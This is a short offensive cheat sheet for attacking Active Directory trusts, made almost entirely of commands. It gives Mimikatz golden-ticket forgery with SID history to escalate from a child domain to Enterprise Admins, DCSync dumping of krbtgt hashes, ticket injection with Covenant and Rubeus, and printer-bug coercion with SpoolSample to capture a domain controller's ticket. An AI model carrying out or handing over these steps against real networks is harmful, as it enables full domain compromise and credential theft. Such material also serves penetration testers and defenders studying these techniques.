Trust
danger
Use only FQDN instead of IP after loading the ticket !
Be aware of the double issue:
SID-Hoping golden ticketâ
info
SID hopping only works for two domain within the same forest since according to Microsoft All domain trusts in an Active Directory forest are two-way, transitive trusts.
Mimikatzâ
Retrieve infos
SID to replace by 519: (New-Object System.Security.Principal.NTAccount("<domain>","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
krbtgt: dcsync <fqdn_child domain> <child_domain>\krbtgt
Get-DomainSID -Domain <fqdn_child_domain>
Get-NetComputer <DC_name>.<fqdn_cild_domain>
Forge and load ticket into memory
kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /ptt
DCSync
lsadump::dcsync /domain:target.evilcorp.com /user:target\krbtgt
Covenant - Defeating the double hop issueâ
Make a token for a user in the compromised domain
MakeToken <user> <domain> '' 9
Forge the ticket
kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /export
echo "<B64>" | base64 -d > ticket.kirbi
Upload the ticket and inject it into memory
upload ticket.kirbi
Rubeus renew /ticket:ticket.kirbi /ptt
DCSync
lsadump::dcsync /domain:target.evilcorp.com /user:target\krbtgt
Printer bugâ
tip
In this example the targeted DC is named dc02.
Retrieve infos
Get-DomainComputer -Domain <target.evilcorp.com>
.\Rubeus.exe monitor /interval:5 /filteruser:dc02$
.\SpoolSample_v4.5_x64.exe <dc02.target.evilcorp.com> <dc01.compromised.evilcorp.com>
cat tmp.b64 | tr -d ' ' | tr -d '\n' > ticket.b64
Rubeus.exe ptt /ticket:<b64>
lsadump::dcsync /domain:<target.evilcorp.com> /user:<target>\krbtgt